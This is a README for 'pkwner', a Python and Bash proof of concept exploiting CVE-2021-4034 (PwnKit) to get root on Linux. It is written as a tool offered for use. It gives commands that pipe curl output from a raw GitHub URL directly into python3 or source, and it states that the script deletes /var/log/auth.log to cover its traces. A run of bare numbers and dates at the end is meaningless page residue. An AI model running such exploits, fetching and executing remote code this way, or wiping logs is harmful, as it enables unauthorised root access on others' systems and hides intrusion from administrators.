██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
Intro
This is a simple PoC for the newly found Polkit error names PwnKit.
I made it both as bash and python3 script - just for the fun of it.
The issue is very simple to abuse but has huge consequences as it will easily give root access on most Linux machines where the attacker has local user access.
How to run
This scripts are a one shot execution so simply do
python3 pkwner.py
or
bash pkwner.sh
You can also run it directly from a webserver (e.g. this github repo) via:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
or
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
In both cases it should look something like this: 
and 
The script will create some files and folders but will cleanup after itself when the root shell is popped - it will even clean up the /var/log/auth.log (because why not).
Credits
- Qualys for finding the issue and making the info public
- Andris Raugulis for making one of the first PoCs to get inspired from
- MiscGang because misgang@Kalmarunionen are baddass
588 Jan 09, 2023
4 Sep 05, 2021
21 Dec 16, 2022
237 Dec 21, 2022
68 Jan 04, 2023
80 Nov 28, 2022
9 Mar 05, 2022
1 Nov 15, 2021
13 Oct 26, 2022
6 Sep 22, 2022
1 Apr 18, 2022
380 Dec 28, 2022
36 Jul 18, 2021
28 Oct 28, 2022
7 Oct 22, 2022
5 Mar 15, 2022
1 Nov 17, 2021
838 Dec 18, 2022
14 Oct 18, 2022
86 Dec 09, 2022